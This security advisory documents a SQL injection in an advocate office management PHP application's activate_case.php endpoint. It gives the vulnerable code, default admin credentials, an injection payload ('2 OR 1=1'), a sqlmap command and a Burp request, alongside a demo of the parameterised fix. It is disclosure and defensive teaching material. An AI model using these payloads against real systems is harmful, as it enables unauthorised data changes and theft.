kortex-activate_case-sqli.md

File metadata and controls

76 lines (57 loc) · 1.81 KB

Kortex Lite Advocate Office Manage System

SQL Injection on /control/activate_case.php

Vendor Homepage:

https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html

Version:

v1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin

Affected Page:

/control/activate_case.php

In /control/activate_case.php (lines 9-11 below), the value of the `id` GET parameter is concatenated directly into an UPDATE statement. No type check, escaping, or prepared statement is applied, so anyone who can reach this page with a valid session (the credentials above are sufficient) can inject arbitrary SQL into the WHERE clause.

```php
9:   $uid = $_GET['id'];                                        // untrusted input, used as-is
10:  $sql = "update case_stage set status=0 where id = $uid";   // interpolated into the query text
11:  $result = $conn->query($sql);                              // executed without parameter binding
```
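To make the impact and the fix concrete, the following added example (not code from the Kortex Lite project) models the same UPDATE against an in-memory SQLite table. The `case_stage` layout with `id` and `status` columns is assumed from the query text in the advisory, not taken from the project's schema, and the three sample rows are constructed here. `deactivate_vulnerable` reproduces the string interpolation from activate_case.php; `deactivate_safe` is the corrected pattern (whitelist the value as an integer, then bind it as a query parameter). SQLite has no `SLEEP()`, so the time-based probes sqlmap uses against MySQL are not reproduced; the boolean effect on the rows is what is shown.

```python
"""Models the activate_case.php query so the effect of the injection can be observed.

Added example, not part of the advisory or the project. Table layout and sample
rows are constructed assumptions based on the query text in the advisory.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three case stages, all active (status=1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE case_stage (id INTEGER PRIMARY KEY, status INTEGER)")
    conn.executemany("INSERT INTO case_stage VALUES (?, ?)", [(1, 1), (2, 1), (3, 1)])
    conn.commit()
    return conn


def deactivate_vulnerable(conn: sqlite3.Connection, uid: str) -> int:
    """Mirror of the advisory's pattern: the raw GET value is spliced into the SQL text.

    Returns the number of rows the UPDATE touched. With uid="2 OR 1=1" the WHERE
    clause becomes `id = 2 OR 1=1`, which matches every row.
    """
    sql = f"update case_stage set status=0 where id = {uid}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def deactivate_safe(conn: sqlite3.Connection, uid: str) -> int:
    """Hardened form: reject anything that is not a plain decimal integer, then
    pass the value as a bound parameter so it can never alter the query structure.
    The PHP equivalent is an intval()/ctype_digit check followed by
    $conn->prepare(...) and bind_param("i", ...) on the mysqli connection.
    """
    if not re.fullmatch(r"[0-9]+", uid):
        raise ValueError("id must be a positive integer")
    cur = conn.execute("update case_stage set status=0 where id = ?", (int(uid),))
    conn.commit()
    return cur.rowcount


def active_ids(conn: sqlite3.Connection) -> list:
    """Ids of case stages still marked active, used to inspect the damage done."""
    return [row[0] for row in conn.execute("select id from case_stage where status=1 order by id")]


def demo() -> dict:
    """Run the legitimate request, the injected request, and the hardened handler."""
    results = {}

    conn = make_db()
    results["legit_rows"] = deactivate_vulnerable(conn, "2")   # intended behaviour: one row
    results["legit_active"] = active_ids(conn)

    conn = make_db()
    results["injected_rows"] = deactivate_vulnerable(conn, "2 OR 1=1")  # every stage deactivated
    results["injected_active"] = active_ids(conn)

    conn = make_db()
    try:
        deactivate_safe(conn, "2 OR 1=1")
        results["safe_rejected"] = False
    except ValueError:
        results["safe_rejected"] = True
    results["safe_rows"] = deactivate_safe(conn, "2")
    results["safe_active"] = active_ids(conn)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `"2 OR 1=1"` case is the simplest way to see why an injectable UPDATE is more than an information leak: a single request changes the status of every row in the table. The same rowcount difference between `2 AND 1=1` and `2 AND 1=2` is what boolean-based detection in sqlmap keys on.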

Proof of Concept:

Payload:

```sh
sqlmap -r request.txt --current-user --batch --dbms mysql
```

Because the injectable statement is an UPDATE, every probe sqlmap sends against this endpoint executes a write on `case_stage`; run it only against a test instance.

Burp Request:

```http
GET /kortex_lite/control/activate_case.php?id=2 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/viewcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close
```

Screenshot:

(image not reproduced in this text export)